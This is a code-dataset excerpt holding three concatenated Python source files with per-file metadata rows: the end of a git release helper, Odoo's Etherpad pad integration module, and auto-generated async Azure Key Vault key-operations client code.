'Cannot release a dirty repository. Make sure all files are committed')
current_version = Version(previous_version)
previous_version = Version(current_version)
current_version.bump(category)
logger.debug('Previous version %r' % previous_version)
logger.debug('Bumped version %r' % current_version)
repo = repo or get_repo(path=path, git_executable=git_executable)
description = description or 'The v%s release of %s' % (current_version,
repo.split('/')[1])
milestones = get_milestones(repo=repo, token=token, logger=logger)
try:
milestone = [
m
for m in milestones
if m['title'] == ('v%s' % current_version) and m['state'] == 'open'
][0]
open_issues = milestone['open_issues']
if open_issues:
raise ReleaseError('The v%s milestone has %d open issues' %
(current_version, open_issues))
except IndexError:
milestone = None
try:
previous_date = get_tag_date('v%s' % previous_version,
path=path,
git_executable=git_executable)
except ExecuteCommandError:
previous_date = None
changelog_data = create_changelog(description=description,
repo=repo,
date=date,
token=token,
current_version=current_version,
previous_version=previous_version,
template=template,
since=previous_date,
logger=logger,
milestone=milestone)
changelog_data = hooks.get('changelog', lambda d: d)(changelog_data)
write_changelog(path=os.path.join(path, changelog),
changelog=changelog_data,
logger=logger)
commit_file(changelog,
'Updated changelog for v%s' % current_version,
git_executable=git_executable,
logger=logger)
write_version(path=os.path.join(path, version),
version=current_version,
logger=logger)
commit_file(version,
'Updated version to v%s' % current_version,
git_executable=git_executable,
logger=logger)
create_git_version_tag(current_version,
message=description,
path=path,
git_executable=git_executable,
logger=logger)
logger.debug('Pushing branch to remote')
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'push']
execute_command(cmd, 'Failed to push to remote', cwd=cwd)
logger.info('Pushed branch to remote')
logger.debug('Pushing tags to remote')
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'push', '--tags']
execute_command(cmd, 'Failed to push tags to remote', cwd=cwd)
logger.info('Pushed tags to remote')
files = []
create_release(path=path,
version=current_version,
description=changelog_data,
git_executable=git_executable,
repo=repo,
logger=logger,
files=files,
token=token)
if milestone:
close_milestone(number=milestone['number'],
repo=repo,
token=token,
logger=logger)
logger.info('Released %s' % current_version)
|
bsd-3-clause
| -6,535,361,961,749,887,000
| 34.026499
| 114
| 0.510472
| false
| 4.129913
| false
| false
| false
|
rven/odoo
|
addons/pad/models/pad.py
|
1
|
5592
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
import random
import re
import string
import requests
from odoo import api, models, _
from odoo.exceptions import UserError
from ..py_etherpad import EtherpadLiteClient
_logger = logging.getLogger(__name__)
class PadCommon(models.AbstractModel):
_name = 'pad.common'
_description = 'Pad Common'
def _valid_field_parameter(self, field, name):
return name == 'pad_content_field' or super()._valid_field_parameter(field, name)
@api.model
def pad_is_configured(self):
return bool(self.env.company.pad_server)
@api.model
def pad_generate_url(self):
company = self.env.company.sudo()
pad = {
"server": company.pad_server,
"key": company.pad_key,
}
# make sure pad server in the form of http://hostname
if not pad["server"]:
return pad
if not pad["server"].startswith('http'):
pad["server"] = 'http://' + pad["server"]
pad["server"] = pad["server"].rstrip('/')
# generate a salt
s = string.ascii_uppercase + string.digits
salt = ''.join([s[random.SystemRandom().randint(0, len(s) - 1)] for i in range(10)])
# path
# etherpad hardcodes pad id length limit to 50
path = '-%s-%s' % (self._name, salt)
path = '%s%s' % (self.env.cr.dbname.replace('_', '-')[0:50 - len(path)], path)
# contruct the url
url = '%s/p/%s' % (pad["server"], path)
# if create with content
if self.env.context.get('field_name') and self.env.context.get('model'):
myPad = EtherpadLiteClient(pad["key"], pad["server"] + '/api')
try:
myPad.createPad(path)
except IOError:
raise UserError(_("Pad creation failed, either there is a problem with your pad server URL or with your connection."))
# get attr on the field model
model = self.env[self.env.context["model"]]
field = model._fields[self.env.context['field_name']]
real_field = field.pad_content_field
res_id = self.env.context.get("object_id")
record = model.browse(res_id)
# get content of the real field
real_field_value = record[real_field] or self.env.context.get('record', {}).get(real_field, '')
if real_field_value:
myPad.setHtmlFallbackText(path, real_field_value)
return {
"server": pad["server"],
"path": path,
"url": url,
}
@api.model
def pad_get_content(self, url):
company = self.env.company.sudo()
myPad = EtherpadLiteClient(company.pad_key, (company.pad_server or '') + '/api')
content = ''
if url:
split_url = url.split('/p/')
path = len(split_url) == 2 and split_url[1]
try:
content = myPad.getHtml(path).get('html', '')
except IOError:
_logger.warning('Http Error: the credentials might be absent for url: "%s". Falling back.' % url)
try:
r = requests.get('%s/export/html' % url)
r.raise_for_status()
except Exception:
_logger.warning("No pad found with url '%s'.", url)
else:
mo = re.search('<body>(.*)</body>', r.content.decode(), re.DOTALL)
if mo:
content = mo.group(1)
return content
# TODO
# reverse engineer protocol to be setHtml without using the api key
def write(self, vals):
self._set_field_to_pad(vals)
self._set_pad_to_field(vals)
return super(PadCommon, self).write(vals)
@api.model
def create(self, vals):
# Case of a regular creation: we receive the pad url, so we need to update the
# corresponding field
self._set_pad_to_field(vals)
pad = super(PadCommon, self).create(vals)
# Case of a programmatical creation (e.g. copy): we receive the field content, so we need
# to create the corresponding pad
if self.env.context.get('pad_no_create', False):
return pad
for k, field in self._fields.items():
if hasattr(field, 'pad_content_field') and k not in vals:
ctx = {
'model': self._name,
'field_name': k,
'object_id': pad.id,
}
pad_info = self.with_context(**ctx).pad_generate_url()
pad[k] = pad_info.get('url')
return pad
def _set_field_to_pad(self, vals):
# Update the pad if the `pad_content_field` is modified
for k, field in self._fields.items():
if hasattr(field, 'pad_content_field') and vals.get(field.pad_content_field) and self[k]:
company = self.env.user.sudo().company_id
myPad = EtherpadLiteClient(company.pad_key, (company.pad_server or '') + '/api')
path = self[k].split('/p/')[1]
myPad.setHtmlFallbackText(path, vals[field.pad_content_field])
def _set_pad_to_field(self, vals):
# Update the `pad_content_field` if the pad is modified
for k, v in list(vals.items()):
field = self._fields.get(k)
if hasattr(field, 'pad_content_field'):
vals[field.pad_content_field] = self.pad_get_content(v)
|
agpl-3.0
| -3,819,001,917,685,144,000
| 36.530201
| 134
| 0.552933
| false
| 3.86722
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/_generated/v2016_10_01/aio/operations/_key_vault_client_operations.py
|
1
|
230715
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class KeyVaultClientOperationsMixin:
async def create_key(
self,
vault_base_url: str,
key_name: str,
parameters: "_models.KeyCreateParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Creates a new key, stores it, then returns key parameters and attributes to the client.
The create key operation can be used to create any key type in Azure Key Vault. If the named
key already exists, Azure Key Vault creates a new version of the key. It requires the
keys/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name for the new key. The system will generate the version name for the
new key.
:type key_name: str
:param parameters: The parameters to create a key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_key.metadata = {'url': '/keys/{key-name}/create'} # type: ignore
async def import_key(
self,
vault_base_url: str,
key_name: str,
parameters: "_models.KeyImportParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Imports an externally created key, stores it, and returns key parameters and attributes to the client.
The import key operation may be used to import any key type into an Azure Key Vault. If the
named key already exists, Azure Key Vault creates a new version of the key. This operation
requires the keys/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: Name for the imported key.
:type key_name: str
:param parameters: The parameters to import a key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.import_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyImportParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
async def delete_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.DeletedKeyBundle":
"""Deletes a key of any type from storage in Azure Key Vault.
The delete key operation cannot be used to remove individual versions of a key. This operation
removes the cryptographic material associated with the key, which means the key is not usable
for Sign/Verify, Wrap/Unwrap or Encrypt/Decrypt operations. This operation requires the
keys/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to delete.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
async def update_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyUpdateParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""The update key operation changes specified attributes of a stored key and can be applied to any key type and key version stored in Azure Key Vault.
In order to perform this operation, the key must already exist in the Key Vault. Note: The
cryptographic material of a key itself cannot be changed. This operation requires the
keys/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of key to update.
:type key_name: str
:param key_version: The version of the key to update.
:type key_version: str
:param parameters: The parameters of the key to update.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
async def get_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
**kwargs: Any
) -> "_models.KeyBundle":
"""Gets the public part of a stored key.
The get key operation is applicable to all key types. If the requested key is symmetric, then
no key material is released in the response. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to get.
:type key_name: str
:param key_version: Adding the version parameter retrieves a specific version of a key.
:type key_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
def get_key_versions(
self,
vault_base_url: str,
key_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.KeyListResult"]:
"""Retrieves a list of individual key versions with the same key name.
The full key identifier, attributes, and tags are provided in the response. This operation
requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_key_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_key_versions.metadata = {'url': '/keys/{key-name}/versions'} # type: ignore
def get_keys(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.KeyListResult"]:
"""List keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a stored key. The LIST operation is applicable to all key types, however only
the base key identifier, attributes, and tags are provided in the response. Individual versions
of a key are not listed in the response. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_keys.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
async def backup_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.BackupKeyResult":
"""Requests that a backup of the specified key be downloaded to the client.
The Key Backup operation exports a key from Azure Key Vault in a protected form. Note that this
operation does NOT return key material in a form that can be used outside the Azure Key Vault
system, the returned key material is either protected to a Azure Key Vault HSM or to Azure Key
Vault itself. The intent of this operation is to allow a client to GENERATE a key in one Azure
Key Vault instance, BACKUP the key, and then RESTORE it into another Azure Key Vault instance.
The BACKUP operation may be used to export, in protected form, any key type from Azure Key
Vault. Individual versions of a key cannot be backed up. BACKUP / RESTORE can be performed
within geographical boundaries only; meaning that a BACKUP from one geographical area cannot be
restored to another geographical area. For example, a backup from the US geographical area
cannot be restored in an EU geographical area. This operation requires the key/backup
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupKeyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.BackupKeyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupKeyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.backup_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupKeyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_key.metadata = {'url': '/keys/{key-name}/backup'} # type: ignore
async def restore_key(
self,
vault_base_url: str,
parameters: "_models.KeyRestoreParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Restores a backed up key to a vault.
Imports a previously backed up key into Azure Key Vault, restoring the key, its key identifier,
attributes and access control policies. The RESTORE operation may be used to import a
previously backed up key. Individual versions of a key cannot be restored. The key is restored
in its entirety with the same key name as it had when it was backed up. If the key name is not
available in the target Key Vault, the RESTORE operation will be rejected. While the key name
is retained during restore, the final key identifier will change if the key is restored to a
different vault. Restore will restore all versions and preserve version identifiers. The
RESTORE operation is subject to security constraints: The target Key Vault must be owned by the
same Microsoft Azure Subscription as the source Key Vault The user must have RESTORE permission
in the target Key Vault. This operation requires the keys/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.restore_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyRestoreParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_key.metadata = {'url': '/keys/restore'} # type: ignore
async def encrypt(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Encrypts an arbitrary sequence of bytes using an encryption key that is stored in a key vault.
The ENCRYPT operation encrypts an arbitrary sequence of bytes using an encryption key that is
stored in Azure Key Vault. Note that the ENCRYPT operation only supports a single block of
data, the size of which is dependent on the target key and the encryption algorithm to be used.
The ENCRYPT operation is only strictly necessary for symmetric keys stored in Azure Key Vault
since protection with an asymmetric key can be performed using public portion of the key. This
operation is supported for asymmetric keys as a convenience for callers that have a
key-reference but do not have access to the public key material. This operation requires the
keys/encrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the encryption operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
